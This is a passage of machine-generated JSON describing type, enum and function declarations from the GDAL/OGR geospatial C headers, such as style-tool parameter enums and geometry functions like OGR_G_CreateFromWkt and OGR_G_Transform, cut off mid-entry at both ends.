"bit-size": 96, "bit-alignment": 32, "type": { "tag": "struct", "ns": 0, "name": "", "id": 79, "location": "/usr/include/gdal/ogr_core.h:721:5", "bit-size": 96, "bit-alignment": 32, "fields": [{ "tag": "field", "name": "Year", "bit-offset": 0, "bit-size": 16, "bit-alignment": 16, "type": { "tag": "GInt16" } }, { "tag": "field", "name": "Month", "bit-offset": 16, "bit-size": 8, "bit-alignment": 8, "type": { "tag": "GByte" } }, { "tag": "field", "name": "Day", "bit-offset": 24, "bit-size": 8, "bit-alignment": 8, "type": { "tag": "GByte" } }, { "tag": "field", "name": "Hour", "bit-offset": 32, "bit-size": 8, "bit-alignment": 8, "type": { "tag": "GByte" } }, { "tag": "field", "name": "Minute", "bit-offset": 40, "bit-size": 8, "bit-alignment": 8, "type": { "tag": "GByte" } }, { "tag": "field", "name": "TZFlag", "bit-offset": 48, "bit-size": 8, "bit-alignment": 8, "type": { "tag": "GByte" } }, { "tag": "field", "name": "Reserved", "bit-offset": 56, "bit-size": 8, "bit-alignment": 8, "type": { "tag": "GByte" } }, { "tag": "field", "name": "Second", "bit-offset": 64, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":float", "bit-size": 32, "bit-alignment": 32 } }] } }] } }, { "tag": "function", "name": "OGRParseDate", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:746:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszInput", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "psOutput", "type": { "tag": ":pointer", "type": { "tag": "OGRField" } } }, { "tag": "parameter", "name": "nOptions", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "enum", "ns": 0, "name": "ogr_style_tool_class_id", "id": 0, "location": "/usr/include/gdal/ogr_core.h:801:14", "fields": [{ "tag": "field", "name": "OGRSTCNone", "value": 0 }, { "tag": "field", "name": "OGRSTCPen", "value": 1 }, { "tag": "field", "name": "OGRSTCBrush", "value": 2 }, { "tag": "field", "name": "OGRSTCSymbol", "value": 3 }, { "tag": "field", "name": "OGRSTCLabel", "value": 4 }, { "tag": "field", "name": "OGRSTCVector", "value": 5 }] }, { "tag": "typedef", "ns": 0, "name": "OGRSTClassId", "location": "/usr/include/gdal/ogr_core.h:809:3", "type": { "tag": ":enum", "name": "ogr_style_tool_class_id", "id": 0 } }, { "tag": "enum", "ns": 0, "name": "ogr_style_tool_units_id", "id": 0, "location": "/usr/include/gdal/ogr_core.h:814:14", "fields": [{ "tag": "field", "name": "OGRSTUGround", "value": 0 }, { "tag": "field", "name": "OGRSTUPixel", "value": 1 }, { "tag": "field", "name": "OGRSTUPoints", "value": 2 }, { "tag": "field", "name": "OGRSTUMM", "value": 3 }, { "tag": "field", "name": "OGRSTUCM", "value": 4 }, { "tag": "field", "name": "OGRSTUInches", "value": 5 }] }, { "tag": "typedef", "ns": 0, "name": "OGRSTUnitId", "location": "/usr/include/gdal/ogr_core.h:822:3", "type": { "tag": ":enum", "name": "ogr_style_tool_units_id", "id": 0 } }, { "tag": "enum", "ns": 0, "name": "ogr_style_tool_param_pen_id", "id": 0, "location": "/usr/include/gdal/ogr_core.h:827:14", "fields": [{ "tag": "field", "name": "OGRSTPenColor", "value": 0 }, { "tag": "field", "name": "OGRSTPenWidth", "value": 1 }, { "tag": "field", "name": "OGRSTPenPattern", "value": 2 }, { "tag": "field", "name": "OGRSTPenId", "value": 3 }, { "tag": "field", "name": "OGRSTPenPerOffset", "value": 4 }, { "tag": "field", "name": "OGRSTPenCap", "value": 5 }, { "tag": "field", "name": "OGRSTPenJoin", "value": 6 }, { "tag": "field", "name": "OGRSTPenPriority", "value": 7 }, { "tag": "field", "name": "OGRSTPenLast", "value": 8 }] }, { "tag": "typedef", "ns": 0, "name": "OGRSTPenParam", "location": "/usr/include/gdal/ogr_core.h:840:3", "type": { "tag": ":enum", "name": "ogr_style_tool_param_pen_id", "id": 0 } }, { "tag": "enum", "ns": 0, "name": "ogr_style_tool_param_brush_id", "id": 0, "location": "/usr/include/gdal/ogr_core.h:845:14", "fields": [{ "tag": "field", "name": "OGRSTBrushFColor", "value": 0 }, { "tag": "field", "name": "OGRSTBrushBColor", "value": 1 }, { "tag": "field", "name": "OGRSTBrushId", "value": 2 }, { "tag": "field", "name": "OGRSTBrushAngle", "value": 3 }, { "tag": "field", "name": "OGRSTBrushSize", "value": 4 }, { "tag": "field", "name": "OGRSTBrushDx", "value": 5 }, { "tag": "field", "name": "OGRSTBrushDy", "value": 6 }, { "tag": "field", "name": "OGRSTBrushPriority", "value": 7 }, { "tag": "field", "name": "OGRSTBrushLast", "value": 8 }] }, { "tag": "typedef", "ns": 0, "name": "OGRSTBrushParam", "location": "/usr/include/gdal/ogr_core.h:859:3", "type": { "tag": ":enum", "name": "ogr_style_tool_param_brush_id", "id": 0 } }, { "tag": "enum", "ns": 0, "name": "ogr_style_tool_param_symbol_id", "id": 0, "location": "/usr/include/gdal/ogr_core.h:864:14", "fields": [{ "tag": "field", "name": "OGRSTSymbolId", "value": 0 }, { "tag": "field", "name": "OGRSTSymbolAngle", "value": 1 }, { "tag": "field", "name": "OGRSTSymbolColor", "value": 2 }, { "tag": "field", "name": "OGRSTSymbolSize", "value": 3 }, { "tag": "field", "name": "OGRSTSymbolDx", "value": 4 }, { "tag": "field", "name": "OGRSTSymbolDy", "value": 5 }, { "tag": "field", "name": "OGRSTSymbolStep", "value": 6 }, { "tag": "field", "name": "OGRSTSymbolPerp", "value": 7 }, { "tag": "field", "name": "OGRSTSymbolOffset", "value": 8 }, { "tag": "field", "name": "OGRSTSymbolPriority", "value": 9 }, { "tag": "field", "name": "OGRSTSymbolFontName", "value": 10 }, { "tag": "field", "name": "OGRSTSymbolOColor", "value": 11 }, { "tag": "field", "name": "OGRSTSymbolLast", "value": 12 }] }, { "tag": "typedef", "ns": 0, "name": "OGRSTSymbolParam", "location": "/usr/include/gdal/ogr_core.h:881:3", "type": { "tag": ":enum", "name": "ogr_style_tool_param_symbol_id", "id": 0 } }, { "tag": "enum", "ns": 0, "name": "ogr_style_tool_param_label_id", "id": 0, "location": "/usr/include/gdal/ogr_core.h:886:14", "fields": [{ "tag": "field", "name": "OGRSTLabelFontName", "value": 0 }, { "tag": "field", "name": "OGRSTLabelSize", "value": 1 }, { "tag": "field", "name": "OGRSTLabelTextString", "value": 2 }, { "tag": "field", "name": "OGRSTLabelAngle", "value": 3 }, { "tag": "field", "name": "OGRSTLabelFColor", "value": 4 }, { "tag": "field", "name": "OGRSTLabelBColor", "value": 5 }, { "tag": "field", "name": "OGRSTLabelPlacement", "value": 6 }, { "tag": "field", "name": "OGRSTLabelAnchor", "value": 7 }, { "tag": "field", "name": "OGRSTLabelDx", "value": 8 }, { "tag": "field", "name": "OGRSTLabelDy", "value": 9 }, { "tag": "field", "name": "OGRSTLabelPerp", "value": 10 }, { "tag": "field", "name": "OGRSTLabelBold", "value": 11 }, { "tag": "field", "name": "OGRSTLabelItalic", "value": 12 }, { "tag": "field", "name": "OGRSTLabelUnderline", "value": 13 }, { "tag": "field", "name": "OGRSTLabelPriority", "value": 14 }, { "tag": "field", "name": "OGRSTLabelStrikeout", "value": 15 }, { "tag": "field", "name": "OGRSTLabelStretch", "value": 16 }, { "tag": "field", "name": "OGRSTLabelAdjHor", "value": 17 }, { "tag": "field", "name": "OGRSTLabelAdjVert", "value": 18 }, { "tag": "field", "name": "OGRSTLabelHColor", "value": 19 }, { "tag": "field", "name": "OGRSTLabelOColor", "value": 20 }, { "tag": "field", "name": "OGRSTLabelLast", "value": 21 }] }, { "tag": "typedef", "ns": 0, "name": "OGRSTLabelParam", "location": "/usr/include/gdal/ogr_core.h:912:3", "type": { "tag": ":enum", "name": "ogr_style_tool_param_label_id", "id": 0 } }, { "tag": "function", "name": "GDALVersionInfo", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:924:34", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "GDALCheckVersion", "ns": 0, "location": "/usr/include/gdal/ogr_core.h:940:25", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nVersionMajor", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "nVersionMinor", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "pszCallingComponentName", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "OGRGeometryH", "location": "/usr/include/gdal/ogr_api.h:60:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "OGRSpatialReferenceH", "location": "/usr/include/gdal/ogr_api.h:74:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "OGRCoordinateTransformationH", "location": "/usr/include/gdal/ogr_api.h:76:15", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "struct", "ns": 0, "name": "_CPLXMLNode", "id": 0, "location": "/usr/include/gdal/ogr_api.h:81:8", "bit-size": 0, "bit-alignment": 0, "fields": [] }, { "tag": "function", "name": "OGR_G_CreateFromWkb", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:85:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRSpatialReferenceH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "OGRGeometryH" } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_G_CreateFromWkt", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:87:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRSpatialReferenceH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "OGRGeometryH" } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_G_CreateFromFgf", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:89:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRSpatialReferenceH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "OGRGeometryH" } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_G_DestroyGeometry", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:91:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_CreateGeometry", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:92:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRwkbGeometryType" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_ApproximateArcAngles", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:94:1", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "dfCenterX", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfCenterY", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfZ", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfPrimaryRadius", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfSecondaryAxis", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfRotation", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfStartAngle", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfEndAngle", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "dfMaxAngleStepSizeDegrees", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_ForceToPolygon", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:100:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_ForceToLineString", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:101:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_ForceToMultiPolygon", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:102:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_ForceToMultiPoint", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:103:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_ForceToMultiLineString", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:104:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_ForceTo", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:105:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hGeom", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "eTargetType", "type": { "tag": "OGRwkbGeometryType" } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_GetDimension", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:109:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_GetCoordinateDimension", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:110:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_CoordinateDimension", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:111:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_SetCoordinateDimension", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:112:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_Is3D", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:113:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_IsMeasured", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:114:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_Set3D", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:115:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_SetMeasured", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:116:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_Clone", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:117:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_GetEnvelope", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:118:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "OGREnvelope" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_GetEnvelope3D", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:119:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "OGREnvelope3D" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_ImportFromWkb", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:120:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_G_ExportToWkb", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:121:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRwkbByteOrder" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_G_ExportToIsoWkb", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:122:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRwkbByteOrder" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_G_WkbSize", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:123:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hGeom", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "OGR_G_ImportFromWkt", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:124:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_G_ExportToWkt", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:125:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_G_ExportToIsoWkt", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:126:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_G_GetGeometryType", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:127:28", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRwkbGeometryType" } }, { "tag": "function", "name": "OGR_G_GetGeometryName", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:128:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_G_DumpReadable", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:129:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_FlattenTo2D", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:130:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_CloseRings", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:131:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_CreateFromGML", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:133:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_ExportToGML", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:134:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_G_ExportToGMLEx", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:135:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_G_CreateFromGMLTree", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:137:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_ExportToGMLTree", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:138:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "function", "name": "OGR_G_ExportEnvelopeToGMLTree", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:139:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":pointer", "type": { "tag": "CPLXMLNode" } } }, { "tag": "function", "name": "OGR_G_ExportToKML", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:141:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "pszAltitudeMode", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_G_ExportToJson", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:143:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_G_ExportToJsonEx", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:144:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "OGR_G_CreateGeometryFromJson", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:146:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": "OGR_G_AssignSpatialReference", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:148:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRSpatialReferenceH" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "OGR_G_GetSpatialReference", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:150:30", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }], "return-type": { "tag": "OGRSpatialReferenceH" } }, { "tag": "function", "name": "OGR_G_Transform", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:151:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRCoordinateTransformationH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_G_TransformTo", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:152:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "", "type": { "tag": "OGRSpatialReferenceH" } }], "return-type": { "tag": "OGRErr" } }, { "tag": "function", "name": "OGR_G_Simplify", "ns": 0, "location": "/usr/include/gdal/ogr_api.h:154:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "hThis", "type": { "tag": "OGRGeometryH" } }, { "tag": "parameter", "name": "tolerance", "type": { "tag": ":double", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "OGRGeometryH" } }, { "tag": "function", "name": 